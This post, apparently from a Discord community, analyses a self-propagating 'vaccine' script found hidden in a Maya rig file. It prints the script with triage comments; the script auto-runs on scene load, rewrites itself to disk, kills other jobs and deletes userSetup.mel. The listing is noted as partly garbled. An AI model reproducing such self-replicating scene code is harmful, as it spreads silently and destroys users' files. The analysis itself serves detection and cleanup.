This is a scene file from the CG Monastery Discord chat user @roly, containing an embedded script that auto-installs and calls itself on SceneSave. The script was found in the rig bat_rig_04.mb, rather than the animation file, TURN_ani_bat_23.ma. Find the imported scene file below (5340 kb).
What happens?
- Installs itself on scene-open, as a `cmds.scriptJob`
- Installs itself on Maya open, as `~/maya/scripts/vaccine.py`
- Warning on scene save with the following message
Suspicious words
- virus
- antivirus
- vaccine
Suspicious calls
Calls that don't belong in any rig or animation file.
- os.makedirs
- os.remove
- os.path.exists
- shutil.copyfile
- cmds.internalVar
Full Script Job
Obfuscated and hidden inside of the binary .mb file is this.
# coding=utf-8
# @Time : 2020/07/05 15:46
# @Author : \\xe9\\xa1\\xb6\\xe5\\xa4\\xa9\\xe7\\xab\\x8b\\xe5\\x9c\\xb0\\xe6\\x99\\xba\\xe6\\x85\\xa7\\xe5\\xa4\\xa7\\xe5\\xb0\\x86\\xe5\\x86\\x9b
# @File : vaccine.py
# \\xe4\\xbb\\x85\\xe4\\xbd\\x9c\\xe4\\xb8\\xba\\xe5\\x85\\xac\\xe5\\x8f\\xb8\\xe5\\x86\\x85\\xe9\\x83\\xa8\\xe4\\xbd\\xbf\\xe7\\x94\\xa8\\xe4\\xbf\\x9d\\xe6\\x8a\\xa4 \\xe4\\xb8\\x80\\xe6\\x97\\xa6\\xe6\\xb3\\x84\\xe9\\x9c\\xb2\\xe5\\x87\\xba\\xe5\\x8e\\xbb\\xe9\\x80\\xa0\\xe6\\x88\\x90\\xe7\\x9a\\x84\\xe5\\xbd\\xb1\\xe5\\x93\\x8d \\xe6\\x9c\\xac\\xe4\\xba\\xba\\xe6\\xa6\\x82\\xe4\\xb8\\x8d\\xe8\\xb4\\x9f\\xe8\\xb4\\xa3
import maya.cmds as cmds
import os
import shutil
# Self-described "vaccine" class that runs inside Maya (every Maya call goes
# through maya.cmds). From the calls visible in this listing it:
#   1. kills scriptJobs and deletes script nodes whose text contains one of
#      three marker strings (antivirus),
#   2. deletes <userAppDir>/scripts/userSetup.mel (antivirus_virus_base),
#   3. copies its own source from <userAppDir>/scripts/vaccine.py into the open
#      scene and, from the scene, back to disk (clone_gene),
#   4. registers a protected "SceneSaved" scriptJob that repeats the scan
#      (occupation).
# Artifacts to look for when triaging a scene or workstation: script nodes named
# 'vaccine_gene' and 'breed_gene', the file <userAppDir>/scripts/vaccine.py, a
# 'history' folder of *_backup.ma copies beside the scene, and a scriptJob whose
# command is "leukocyte.antivirus()".
# NOTE(review): indentation was lost when this listing was extracted and parts
# of clone_gene are visibly garbled, so the nesting described in the comments
# below is inferred from syntax. Compare against the original sample before
# relying on details.
class phage:
# Copy the scene file at `path` to "<folder>/history/<stem>_backup.ma ".
# Folder and stem are taken by splitting on the last '/' and the last '.'.
# NOTE(review): the suffix literal ends with a space ('_backup.ma '); that may
# be an extraction artifact - confirm against the original sample.
@staticmethod
def backup(path):
folder_path = path.rsplit('/', 1)[0]
file_name = path.rsplit('/', 1)[-1].rsplit('.', 1)[0]
backup_folder = folder_path + '/history'
new_file = backup_folder + '/' + file_name + '_backup.ma '
# Create the history folder on first use. shutil.copyfile overwrites an
# existing destination, so only the most recent backup per scene name is kept.
if not os.path.exists(backup_folder):
os.makedirs(backup_folder)
shutil.copyfile(path, new_file)
# Scan-and-clean routine; occupation() registers it to run on every SceneSaved
# event. Order of work: re-seed the script nodes (clone_gene), delete
# userSetup.mel (antivirus_virus_base), kill matching scriptJobs, delete
# matching script nodes, then back up and re-save the scene if a matching
# scriptJob was found. Results are reported through cmds.error / cmds.warning.
def antivirus(self):
health = True
self.clone_gene()
self.antivirus_virus_base()
# Substrings this script treats as signatures of other infections. They are
# matched with a plain `in` test against scriptJob descriptions and against
# script-node bodies, so any job or node merely containing one of them is hit.
virus_gene = ['sysytenasdasdfsadfsdaf_dsfsdfaasd', 'PuTianTongQing', 'daxunhuan']
all_script_jobs = cmds.scriptJob(listJobs=True)
for each_job in all_script_jobs:
for each_gene in virus_gene:
if each_gene in each_job:
health = False
# Each listJobs entry is parsed as "<number>:<description>"; the integer before
# the first ':' is used as the job id. force=True is passed so that protected
# jobs are killed as well (per Maya's scriptJob documentation).
job_num = int(each_job.split(':', 1)[0])
cmds.scriptJob(kill=job_num, force=True)
# Second pass: script nodes stored in the scene. Only the '.before' attribute
# is inspected; '.after' is not checked anywhere in this listing.
all_script = cmds.ls(type='script')
if all_script:
for each_script in all_script:
commecnt = cmds.getAttr(each_script + '.before')
for each_gene in virus_gene:
if commecnt:
if each_gene in commecnt:
# The bare except hides the real reason a delete failed. The handler reports
# the text before the last ':' of the node name, so the failing case is
# presumably a namespaced (referenced) node - confirm.
try:
cmds.delete(each_script)
except:
name_space = each_script.rsplit(':',1)[0]
# Message appears to decode (UTF-8, Chinese) to roughly:
# "{} is infected, but I cannot delete it".
cmds.error(u'{}\\xe8\\xa2\\xab\\xe6\\x84\\x9f\\xe6\\x9f\\x93\\xe4\\xba\\x86\\xef\\xbc\\x8c\\xe4\\xbd\\x86\\xe6\\x98\\xaf\\xe6\\x88\\x91\\xe6\\xb2\\xa1\\xe6\\xb3\\x95\\xe5\\x88\\xa0\\xe9\\x99\\xa4'.format(name_space))
# `health` is only set to False in the scriptJob loop above, so in this listing
# a scene where only script nodes matched still takes the else branch.
if not health:
# Back up the scene, then save it in place. clone_gene() has already added its
# script nodes to the open scene, so the saved file carries them onward.
# NOTE(review): sceneName is presumably empty for a never-saved scene, in which
# case backup('') would fail - confirm.
file_path = cmds.file(query=True, sceneName=True)
self.backup(file_path)
cmds.file(save=True)
# Message appears to decode to roughly: "Your file was infected, but I have
# thoughtfully disinfected it and backed it up for you ~ no need to thank me ~".
cmds.error(u'\\xe4\\xbd\\xa0\\xe7\\x9a\\x84\\xe6\\x96\\x87\\xe4\\xbb\\xb6\\xe8\\xa2\\xab\\xe6\\x84\\x9f\\xe6\\x9f\\x93\\xe4\\xba\\x86\\xef\\xbc\\x8c\\xe4\\xbd\\x86\\xe6\\x98\\xaf\\xe6\\x88\\x91\\xe8\\xb4\\xb4\\xe5\\xbf\\x83\\xe7\\x9a\\x84\\xe4\\xb8\\xba\\xe6\\x82\\xa8\\xe6\\x9d\\x80\\xe6\\xaf\\x92\\xe5\\xb9\\xb6\\xe4\\xb8\\x94\\xe5\\xa4\\x87\\xe4\\xbb\\xbd\\xe4\\xba\\x86~\\xe4\\xb8\\x8d\\xe7\\x94\\xa8\\xe8\\xb0\\xa2~')
else:
# Message appears to decode to roughly: "Your file is very healthy ~ just
# letting you know, nothing else meant". This is the warning users see on save.
cmds.warning(u'\\xe4\\xbd\\xa0\\xe7\\x9a\\x84\\xe6\\x96\\x87\\xe4\\xbb\\xb6\\xe8\\xb4\\xbc\\xe5\\x81\\xa5\\xe5\\xba\\xb7~\\xe6\\x88\\x91\\xe5\\xb0\\xb1\\xe8\\xaf\\xb4\\xe4\\xb8\\x80\\xe5\\xa3\\xb0\\xe6\\xb2\\xa1\\xe6\\x9c\\x89\\xe5\\x88\\xab\\xe7\\x9a\\x84\\xe6\\x84\\x8f\\xe6\\x80\\x9d')
# Delete <userAppDir>/scripts/userSetup.mel if it exists.
# The file is removed without looking at its contents, so any legitimate
# startup customisation in it is lost along with whatever this script targets.
# No copy is kept; recovery has to come from the user's own backups.
@staticmethod
def antivirus_virus_base():
virus_base = cmds.internalVar(userAppDir=True) + '/scripts/userSetup.mel'
if os.path.exists(virus_base):
try:
os.remove(virus_base)
except:
# Message appears to decode to roughly: "Disinfection failed".
cmds.error(u'\\xe6\\x9d\\x80\\xe6\\xaf\\x92\\xe5\\xa4\\xb1\\xe8\\xb4\\xa5')
# Persist this script in both directions, disk -> scene and scene -> disk:
#   'vaccine_gene' script node - carries the text of vaccine.py in a 'notes'
#                                string attribute;
#   'breed_gene' script node   - its body rewrites vaccine.py from that
#                                attribute when the file is missing.
# Both nodes are created with st=1 (scriptType); per Maya's scriptNode
# documentation that runs the bs (beforeScript) body when the file is loaded,
# which matches the page's "installs itself on scene-open".
# NOTE(review): as printed this method cannot run (undefined names, missing
# quotes inside the embedded code) - see the notes below.
def clone_gene(self):
vaccine_path = cmds.internalVar(userAppDir=True) + '/scripts/vaccine.py'
if not cmds.objExists('vaccine_gene'):
if os.path.exists(vaccine_path):
# Read this script's own source from disk, one list element per line.
gene = list()
with open(vaccine_path, "r") as f:
for line in f.readlines():
gene.append(line)
# The triple-quoted text below is data; it is not executed here. As printed it
# is assigned to `npetri_dish_gene` but refers to `petri_dish_gene` and
# `petri_dish_path`, neither of which is defined in this listing, and its inner
# quotes are gone ("+ /scripts"). It reads like the remains of a bootstrap that
# imports vaccine and calls phage().occupation() - treat it as incomplete.
npetri_dish_gene = """
import sys
import maya.cmds as cmds
maya_path = cmds.internalVar(userAppDir=True) + /scripts
if maya_path not in sys.path:
sys.path.append(maya_path)
import vaccine
cmds.evalDeferred(leukocyte = vaccine.phage())
cmds.evalDeferred(leukocyte.occupation())
with open(petri_dish_path, "w") as f:
f.writelines(petri_dish_gene)
"""
# `bs` is not defined anywhere in this listing (NameError as printed);
# presumably the bootstrap text above was meant - TODO confirm against the
# original sample.
cmds.scriptNode(st=1,
n='vaccine_gene', stp='python',
bs=bs)
# NOTE(review): `gene` is a Python list handed to a string attribute; how it is
# serialised is not shown here. The breed_gene body calls eval() on this value,
# which suggests the original stored a str()/repr() of the list - confirm.
cmds.addAttr('vaccine_gene', ln="notes", sn="nts", dt="string")
cmds.setAttr('vaccine_gene.notes', gene, type='string')
# breed_gene re-creates vaccine.py on disk from 'vaccine_gene.notes' whenever
# the file is missing, so deleting vaccine.py alone does not clean a workstation
# while affected scenes are still being opened; both nodes have to be removed
# from the scenes as well.
# Its body calls eval() on an attribute read from the scene file. Scene content
# is untrusted input, so whatever is stored in that attribute gets evaluated.
# Inner quotes are missing in the body as printed ("/scripts/vaccine.py",
# vaccine_gene, vaccine_gene.notes).
if not cmds.objExists('breed_gene'):
cmds.scriptNode(st=1,
n='breed_gene',
stp='python',
bs="""\
import os
vaccine_path = cmds.internalVar(userAppDir=True) + /scripts/vaccine.py
if not os.path.exists(vaccine_path):
if cmds.objExists(vaccine_gene):
gene = eval(cmds.getAttr(vaccine_gene.notes))
with open(vaccine_path, "w") as f:
f.writelines(gene)
""")
# Register the persistent hook: a scriptJob on the "SceneSaved" event whose
# command is the string "leukocyte.antivirus()".
# The command is a string resolved when the event fires, so it depends on a
# global named `leukocyte` existing in Maya's Python session (the embedded
# bootstrap text in clone_gene refers to one).
# protected=True: per Maya's scriptJob documentation such a job is only killed
# when force is given, i.e. cmds.scriptJob(kill=<id>, force=True) - the same
# call antivirus() uses on other jobs.
def occupation(self):
cmds.scriptJob(event=["SceneSaved", "leukocyte.antivirus()"], protected=True)
just came across this randomly, here's a few strings in that file translated into English.
Vaguely looks like self-propagating guerilla antivirus. Designed to remove certain malware from Maya installs, hilarious.
^ Hilarious. There must be a story behind this.